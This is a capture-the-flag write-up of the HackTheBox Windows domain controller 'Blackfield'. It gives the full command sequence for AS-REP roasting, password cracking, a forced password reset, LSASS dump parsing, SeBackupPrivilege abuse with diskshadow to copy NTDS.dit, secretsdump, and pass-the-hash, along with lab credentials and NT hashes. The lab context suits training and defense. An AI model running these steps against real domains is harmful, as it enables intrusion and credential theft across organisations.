Blackfield is a hard difficulty Windows machine that features Active Directory environment. It begins with collecting a list of usernames from an SMB share. With these usernames, I’m able to perform AS-REP roasting attack and obtain a TGT from a helpdesk account. The helpdesk account can be used to reset the password of an audit account. Re-enumerating SMB shares using the audit account finds an LSASS memory dump file.
The dump file contains an NT hash of a service account that is a member of Backup Operators. The privileges of the Backup Operators group can be abused to create a volume shadow copy and pull the NTDS.dit
file from there. With the NTDS.dit
file, I'm able to retrieves the NT hash of the administrator account, and then perform pass-the-hash attack to gain administrator access.
Reconnaissance
Nmap
nmap -sC -sV -oN initial-blackfield 10.10.10.192
An initial TCP scan with nmap
discovered at least seven open ports. These ports are the typical port used by Active Directory Domain Controller (AD DC).
I’ll summarize the result:
- There is a DNS service on port 53, but HTB box is a single machine, so enumerating this service is not priority.
- There is a Kerberos service on port 88 is running Kerberos. I can try AS-REP roasting here.
- There is MS-RPC service on port 135, which I don’t touch it really often, so I’ll lower the priority.
- There is an LDAP service on port 389, LDAP is the standard protocol for directory services. Active Directory is Microsoft’s implementation of directory services and it supports LDAP query.
- There is an SMB service on port 445. I can try anonymous login here.
- Port 3268 is running LDAP as well, but it’s used as global catalog (read more: here).
nmap
also identified the AD domain name is blackfield.local
.
TCP 389 — LDAP
On LDAP, I can send a query to obtain the domain metadata, but first I’ll look into the rootDSE to retrieve a list of the domain naming context.
ldapsearch -LLL -x -h 10.10.10.192 -s base namingContexts
-LLL
: don’t show comments-x
: use simple authentication-h
: hostname or ip-s
: search scope on base or rootDSE
I can use DC=BLACKFIELD,DC=local
(this is called as distinguished name), but unfortunately the anonymous bind is not allowed.
ldapsearch -LLL -x -h 10.10.10.192 -b "DC=BLACKFIELD,DC=local"
But unfortunately, the anonymous bind is not allowed.
TCP 445 — SMB
Trying anonymous login with crackmapexec
returns a status access denied.
crackmapexec smb 10.10.10.192 -u '' -p '' --shares
But with smbclient
, it return the shares list.
Later, I came to know that ‘anonymous’ must be specified in crackmapexec
.
I have read permission on the profile$
share. The share contains a bunch of empty users folder.
I can convert these folders name to list of username using awk '{print $1}'
.
Now that I have a list of usernames, I can try AS-REP roast attack on Kerberos
TCP 88 — Kerberos
I’ll use GetNPUsers.py
to perform AS-REP roasting on Kerberos.
GetNPUsers.py BLACKFIELD.LOCAL/ -no-pass -usersfile asreproast -dc-ip 10.10.10.192 -outputfile TGT_AS-REP
And watching the output file using watch command
watch -n 1 cat TGT_AS-REP
I’ll send the hash to my Windows for cracking.
:: Cracking the Hash
I’ll use dictionary attack to recover the user password using hashcat
, and it cracks within a few seconds.
hashcat -m 18200 hashes/blackfield.hash rockyou.txt -O
The password for user support
is #00^BlackKnight
.
Access as support
Now that I obtained a set of credentials, I can re-enumerate the available services.
:: LDAP Domain Dump
ldapdomaindump -u ‘BLACKFIELD.LOCAL\support’ -p ‘#00^BlackKnight’ -no-json -no-grep 10.10.10.192
The credentials works on LDAP, I can use it to obtain the domain info using ldapdomaindump.
The output from the tool are formatted in HTML document, and I get the following information:
The OS information and the computer FQDN.
The domain policy.
Interesting domain users.
Interesting groups
From here, I know that user support
does not have remote shell access like WinRM.
:: Bloodhound
There is a python-based ingestor for BloodHound
besides SharpHound
. It can be used remotely from Linux.
python bloodhound.py -c All -u 'support@blackfield.local' -p '#00^BlackKnight' -d blackfield.local -dc DC01.BLACKFIELD.local -ns 10.10.10.192
-c
: collect method : all-u
,-p
: credentials set-d
: domain name-dc
: FQDN of domain controller (it’s on ldap domain dump section → domain_computers.html)-ns
: name server / DNS
It returns the following output:
My default python is python2
The output files from the tool are in json format. They are: computers.json
, domains.json
, groups.json
and users.json
.
I can upload these files to BloodHound
GUI by drag and drop.
Enumerating the user support
permissions discovers it has ForceChangePassword
permission on Audit2020. That means user support
is able to change the user audit2020
password.
:: Reset Audit2020 Password
I can change the user audit2020
password using net rpc
. I’ll set P@$$w0rd!
as the new password for user audit2020
.
net rpc password audit2020 -U ‘support%#00^BlackKnight’ -S 10.10.10.192
Access as Audit2020
:: forensic share
With audit2020
, I can access the forensic share.
smbmap -H 10.10.10.192 -u audit2020 -p 'P@$$w0rd!'
Inside the share, there is three folders, and I’ll download all of them to my Kali.
smbclient -U ‘audit2020%P@$$w0rd!’ //10.10.10.192/forensic
Enumerating on the memory_analysis folder, there is a file called lsass.zip
that contains lsass.DMP
which is interesting to me.
lsass (local security authentication subsystem service) is a service/process that used to verify and authenticate users on login to a windows computer. In short, it holds the credentials from the windows registry, CMIIW
I can use a tool called pypykatz
to dump the contents of lsass.DMP
, and the NT hash of svc-backup
immediately shows up on the top
svc_backup:9658d1d1dcd9250115e2205d9f48400d
Foothold
Remote Access
I already know that svc_backup
can login remotely (from LDAP), so I can try it with evil-winrm
, and it works.
Evil-winrm -i 10.10.10.192 -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'
User flag is done here. *Actually I found a notes.txt in C:\, I’ll just skip that here.
Privileges Escalation
Internal enumeration
Also from LDAP, we know svc-backup
is a member of the Backup Operators group. Each member of the Backup Operators group can perform backup and restore operations. The privilege name to perform those two operations are called SeBackupPrivilege
and SeRestorePrivilege
.
Those two privileges can be abused using diskshadow
(check out the references on the bottom of this writeup for sources).
I can’t just perform the backup and restore if the system is currently in use. But, there is a technology from Microsoft called “Shadow Copy” that makes this possible, and that’s where diskshadow
will be used.
So the idea is that I can create a volume shadow of C:\
drive and backup the NTDS.dit
file (AD database) from the volume shadow back to C:\
drive. After that I can grab the ntds.dit
and dump the NT hashes from NTDS.dit
locally using secretsdump.py
.
Abusing SeBackupPrivilege
To abuse this privilege I’ll use this gist as reference as well as this module.
Then, I’ll create two scripts to perform all the needed actions (create a volume, grab ntds.dit
, and cleanup the volume shadow) in one shot.
First, the script for grabbing ntds.dit
, I’ll save it as copy.cmd
cmd.exe /c "powershell.exe -c Import-Module(Resolve-Path('SeBackupPrivilegeCmdLets.dll')); Import-Module(Resolve-Path('SeBackupPrivilegeCmdLets.dll')); Copy-FileSeBackupPrivilege f:\windows\ntds\ntds.dit C:\temp\ntds.dit"
Second, the script for creating and deleting the volume shadow, I’ll save it as script.txt
.
set context persistent nowriters
add volume c: alias iamf
create
expose %iamf% f:
exec "copy.cmd"
delete shadows volume %iamf%
reset
I’ll move the modules and the scripts to a folder called exploits
.
Now, I’ll copy these .dll
modules, copy.cmd
, and script.txt
to Blackfield using upload feature from evil-winrm
at C:\temp\
.
After that, I can run diskshadow
with the /s
option and specify script.txt
as the command sequence.
Evil-WinRM* PS C:\temp> diskshadow /s script.txt
Now that I have the ntds.dit
, the last file that I need is the registry hive.
Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM c:\temp\system
The operation completed successfully.
I’ll download these files to my Kali using evil-winrm
download feature.
Credential Dumping
Now I can dump the NT hash from ntds.dit
and system
file using secretsdump.py
.
secretsdump.py -system system -ntds ntds.dit LOCAL
Remote Access
I can use the NT hash of administrator account to login using evil-winrm
pass-the-hash feature.
evil-winrm -i 10.10.10.192 -u administrator -H ‘184fb5e5178480be64824d4cd53b99ee’